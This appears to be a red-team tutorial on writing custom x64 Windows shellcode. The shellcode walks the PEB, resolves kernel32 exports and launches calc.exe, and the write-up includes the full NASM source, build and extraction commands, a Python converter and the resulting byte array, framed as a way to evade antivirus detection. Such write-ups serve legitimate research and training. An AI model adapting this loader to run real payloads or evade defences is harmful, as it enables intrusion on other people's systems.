Custom Shellcode

When developing exploits, particularly for red teaming or research, one common task is to inject potentially malicious shellcode. However, using tools like msfvenom to generate shellcode often results in payloads quickly flagged by antivirus software. To overcome this, we’ll write our own custom 64-bit shellcode that dynamically resolves function addresses in kernel32.dll and opens calc.exe. This process not only avoids detection but also gives you more control over the shellcode’s behavior.

In this write up, we’ll develop the shellcode in assembly, compile it, and later extract the raw shellcode bytes for use in our exploits.

Challenge

Shellcode should be position-independent, meaning it can execute correctly regardless of where in memory it is placed. Additionally, it should dynamically resolve necessary function addresses at runtime, as hardcoding addresses may be unreliable across different systems. This helps to ensure that the shellcode is both flexible and hopefully stealthier.

Solution

We aim to create shellcode that:

  • Dynamically resolves the base address of kernel32.dll.
  • Locates the address of WinExec using the Export Address Table.
  • Calls WinExec to open calc.exe.
  • Cleans up by calling ExitProcess to exit gracefully.

Prerequisites

The following material for this write up was performed with the Mandiant Offensive VM (CommandoVM) using the developer installation profile.

To compile and run this assembly code, the following was used:

  • Microsoft Visual Studio: Specifically, the link.exe tool provided by Visual Studio is required to link the assembled object file into an executable.
  • NASM (Netwide Assembler): A popular assembler used for writing assembly code.
  • Python: For converting the binary shellcode into a format that can be included in a C program.

Writing the Assembly Code

Here is the assembly code that dynamically resolves kernel32.dll and opens calc.exe. It includes the data and code in the .text section so that the shellcode can be extracted entirely.

section .text
    kernel32_dll    db  'KERNEL32.DLL', 0          ; String for the kernel32.dll library
    loadlib_func    db  'LoadLibraryA', 0          ; String for LoadLibraryA function
    winexec_func    db  'WinExec', 0               ; String for WinExec function
    calc_str        db  'calc.exe', 0              ; Command to open calc.exe
    exitproc_func   db  'ExitProcess', 0           ; String for ExitProcess function

global _start

_start:
    sub rsp, 28h            ; Reserve stack space for function calls (align stack)

    ; 1. Resolve LoadLibraryA to dynamically load DLLs if needed
    lea rdx, [rel loadlib_func]  ; Load the address of the LoadLibraryA string into rdx
    lea rcx, [rel kernel32_dll]  ; Load the address of the kernel32.dll string into rcx
    call lookup_api         ; Call lookup_api to resolve the address of LoadLibraryA
    mov r15, rax            ; Save the address of LoadLibraryA in r15 for later use

    ; 2. Load kernel32.dll (it's already loaded, but this demonstrates the mechanism)
    lea rcx, [rel kernel32_dll]  ; Load the address of the kernel32.dll string into rcx
    call rax                ; Call LoadLibraryA (stored in rax) to load kernel32.dll

    ; 3. Resolve the address of WinExec
    lea rdx, [rel winexec_func]  ; Load the address of the WinExec string into rdx
    lea rcx, [rel kernel32_dll]  ; Load the address of the kernel32.dll string into rcx
    call lookup_api         ; Call lookup_api to resolve the address of WinExec

    ; 4. Call WinExec to open calc.exe
    lea rcx, [rel calc_str] ; Load the address of the calc.exe string into rcx
    mov rdx, 1              ; Set uCmdShow = SW_SHOWNORMAL (show the window)
    call rax                ; Call WinExec with the parameters set above

    ; 5. Resolve the address of ExitProcess
    lea rdx, [rel exitproc_func]  ; Load the address of the ExitProcess string into rdx
    lea rcx, [rel kernel32_dll]   ; Load the address of the kernel32.dll string into rcx
    call lookup_api         ; Call lookup_api to resolve the address of ExitProcess

    xor rcx, rcx            ; Set the exit code to 0 (normal exit)
    call rax                ; Call ExitProcess to terminate the process

; lookup_api: Look up the address of a function within a DLL's export table
; rcx=DLL name string, rdx=function name string
; returns the function's address in rax
lookup_api:
    sub rsp, 28h            ; Align the stack

    ; Access the PEB (Process Environment Block) to find the base address of kernel32.dll
    mov r8, gs:[60h]        ; Load the PEB base address into r8
    mov r8, [r8+18h]        ; Follow the pointer to the PEB_LDR_DATA structure
    lea r12, [r8+10h]       ; Get the address of the InLoadOrderModuleList list head
    mov r8, [r12]           ; Move to the first entry in the InLoadOrderModuleList list

    cld                     ; Clear the direction flag for string operations

for_each_dll:               ; Loop through the list of loaded modules
    mov rdi, [r8+60h]       ; Get the UNICODE_STRING.Buffer pointer (module name) in rdi
    mov rsi, rcx            ; Load the DLL name string we're looking for into rsi

compare_dll:
    lodsb                   ; Load a byte from rsi into al (pointed to by rsi)
    test al, al             ; Test if we've reached the end of the DLL name string
    jz found_dll            ; If so, we've found the matching DLL

    mov ah, [rdi]           ; Load a byte from the current module name into ah
    cmp ah, 61h             ; Compare with lowercase 'a'
    jl uppercase            ; If less, it's uppercase already
    sub ah, 20h             ; Convert lowercase to uppercase

uppercase:
    cmp ah, al              ; Compare the characters
    jne wrong_dll           ; If they don't match, this isn't the right DLL

    inc rdi                 ; Move to the next character in the module name
    inc rdi                 ; UNICODE_STRING is wide (2 bytes per character)
    jmp compare_dll         ; Continue comparing the DLL name

wrong_dll:
    mov r8, [r8]            ; Move to the next LDR_DATA_TABLE_ENTRY (next module)
    cmp r8, r12             ; Compare to see if we've looped back to the start
    jne for_each_dll        ; If not, keep searching

    xor rax, rax            ; If DLL not found, return 0 in rax
    jmp done

found_dll:
    mov rbx, [r8+30h]       ; Get the DLL base address (points to DOS "MZ" header)
    mov r9d, [rbx+3Ch]      ; Get the e_lfanew field from the DOS header (PE header offset)
    add r9, rbx             ; r9 now points to the PE header
    add r9, 88h             ; Move to the Export Directory RVA in the optional header

    mov r13d, [r9]          ; Get the virtual address of the Export Directory
    test r13, r13           ; Test if the DLL has an export table
    jz done                 ; If not, return 0 in rax

    lea r8, [rbx+r13]       ; r8 now points to the Export Directory
    mov r14d, [r9+4]        ; Get the size of the Export Directory
    add r14, r13            ; Calculate the end of the Export Directory

    mov ecx, [r8+18h]       ; Get the number of names in the export table
    mov r10d, [r8+20h]      ; Get the AddressOfNames array RVA
    add r10, rbx            ; r10 now points to the AddressOfNames array

    dec ecx                 ; Decrement ecx to point to the last element
for_each_func:
    lea r9, [r10 + 4*rcx]   ; Load the RVA of the function name into r9

    mov edi, [r9]           ; Get the function name RVA
    add rdi, rbx            ; rdi now points to the function name string in memory
    mov rsi, rdx            ; Load the function name string we're looking for into rsi

compare_func:
    cmpsb                   ; Compare the strings byte by byte
    jne wrong_func          ; If they don't match, try the next function

    mov al, [rsi]           ; Load the current character of our function string
    test al, al             ; Test if we've reached the end of the string
    jz found_func           ; If so, we've found the matching function

    jmp compare_func        ; Continue comparing the function name

wrong_func:
    loop for_each_func      ; Try the next function in the export table

    xor rax, rax            ; If function not found, return 0 in rax
    jmp done

found_func:
    mov r9d, [r8+24h]       ; Get the AddressOfNameOrdinals array RVA
    add r9, rbx             ; r9 now points to the AddressOfNameOrdinals array
    mov cx, [r9+2*rcx]      ; Get the function's ordinal value

    mov r9d, [r8+1Ch]       ; Get the AddressOfFunctions array RVA
    add r9, rbx             ; r9 now points to the AddressOfFunctions array
    mov eax, [r9+rcx*4]     ; Get the function's address RVA using the ordinal
    add rax, rbx            ; Add the DLL base address to the RVA to get the function's address

done:
    add rsp, 28h            ; Restore the stack
    ret                     ; Return the function's address in rax
    

Compilation Commands

Once you have written the assembly code in a file (e.g. shellcode.asm), you can compile and link it using the following commands:

nasm -f win64 shellcode.asm -o shellcode.o
link /SUBSYSTEM:CONSOLE /MACHINE:X64 /ENTRY:_start shellcode.o /OUT:shellcode.exe
    

These commands will produce an executable (shellcode.exe) that, when run, will open calc.exe.

Extracting the Shellcode

To extract the raw shellcode from the compiled executable, we can use the following technique. First, run this command:

dumpbin /headers shellcode.exe

You will see an output that includes a section similar to this:

SECTION HEADER #1
   .text name
     14C virtual size
    1000 virtual address (0000000140001000 to 000000014000114B)
     200 size of raw data
     200 file pointer to raw data (00000200 to 000003FF)
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         Execute Read
    

Converting these numbers to decimal, this means we need to extract 332 (0x14C) bytes beginning at offset 512 (0x200) in the file. You can extract this with the following command:

dd if=shellcode.exe of=shellcode.bin bs=1 count=332 skip=512

Now we have a file shellcode.bin containing our shellcode. Next, we can convert it to a hexadecimal format that can be easily copied into a C program. Here’s a Python script to do that:

import sys

def bin_to_shellcode(bin_file_path):
    with open(bin_file_path, "rb") as bin_file:
        binary_data = bin_file.read()

    # Convert each byte to a "\x" formatted string
    shellcode = '\\x' + '\\x'.join(f'{byte:02x}' for byte in binary_data)
    
    # Split the shellcode into lines of maximum 16 bytes (32 characters for hex)
    max_bytes_per_line = 16
    lines = [shellcode[i:i+max_bytes_per_line*4] for i in range(0, len(shellcode), max_bytes_per_line*4)]

    # Format it into a C array
    formatted_shellcode = 'unsigned char shellcode[] = \n"' + '"\n"'.join(lines) + '";'
    
    return formatted_shellcode

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python script_name.py ")
        sys.exit(1)

    bin_file_path = sys.argv[1]
    shellcode = bin_to_shellcode(bin_file_path)
    print(shellcode)
    

Running the python script on shellcode.bin:

python convert.py shellcode.bin

Running this script on shellcode.bin will output shellcode like the following:

unsigned char shellcode[] =
"\x48\x83\xec\x28\x48\x8d\x15\x17\x01\x00\x00\x48\x8d\x0d\x03\x01"
"\x00\x00\xe8\x45\x00\x00\x00\x49\x89\xc7\x48\x8d\x0d\xf4\x00\x00"
"\x00\xff\xd0\x48\x8d\x15\x05\x01\x00\x00\x48\x8d\x0d\xe4\x00\x00"
"\x00\xe8\x26\x00\x00\x00\x48\x8d\x0d\xfa\x00\x00\x00\xba\x01\x00"
"\x00\x00\xff\xd0\x48\x8d\x15\xf5\x00\x00\x00\x48\x8d\x0d\xc3\x00"
"\x00\x00\xe8\x05\x00\x00\x00\x48\x31\xc9\xff\xd0\x48\x83\xec\x28"
"\x65\x4c\x8b\x04\x25\x60\x00\x00\x00\x4d\x8b\x40\x18\x4d\x8d\x60"
"\x10\x4d\x8b\x04\x24\xfc\x49\x8b\x78\x60\x48\x89\xce\xac\x84\xc0"
"\x74\x23\x8a\x27\x80\xfc\x61\x7c\x03\x80\xec\x20\x38\xc4\x75\x08"
"\x48\xff\xc7\x48\xff\xc7\xeb\xe5\x4d\x8b\x00\x4d\x39\xe0\x75\xd6"
"\x48\x31\xc0\xeb\x6b\x49\x8b\x58\x30\x44\x8b\x4b\x3c\x49\x01\xd9"
"\x49\x81\xc1\x88\x00\x00\x00\x45\x8b\x29\x4d\x85\xed\x74\x51\x4e"
"\x8d\x04\x2b\x45\x8b\x71\x04\x4d\x01\xee\x41\x8b\x48\x18\x45\x8b"
"\x50\x20\x49\x01\xda\xff\xc9\x4d\x8d\x0c\x8a\x41\x8b\x39\x48\x01"
"\xdf\x48\x89\xd6\xa6\x75\x08\x8a\x06\x84\xc0\x74\x09\xeb\xf5\xe2"
"\xe6\x48\x31\xc0\xeb\x1a\x45\x8b\x48\x24\x49\x01\xd9\x66\x41\x8b"
"\x0c\x49\x45\x8b\x48\x1c\x49\x01\xd9\x41\x8b\x04\x89\x48\x01\xd8"
"\x48\x83\xc4\x28\xc3\x4b\x45\x52\x4e\x45\x4c\x33\x32\x2e\x44\x4c"
"\x4c\x00\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x00\x57"
"\x69\x6e\x45\x78\x65\x63\x00\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
"\x45\x78\x69\x74\x50\x72\x6f\x63\x65\x73\x73\x00";
    

This shellcode can now be used in your C programs or further tested in your exploits.

References and Resources

Scroll to Top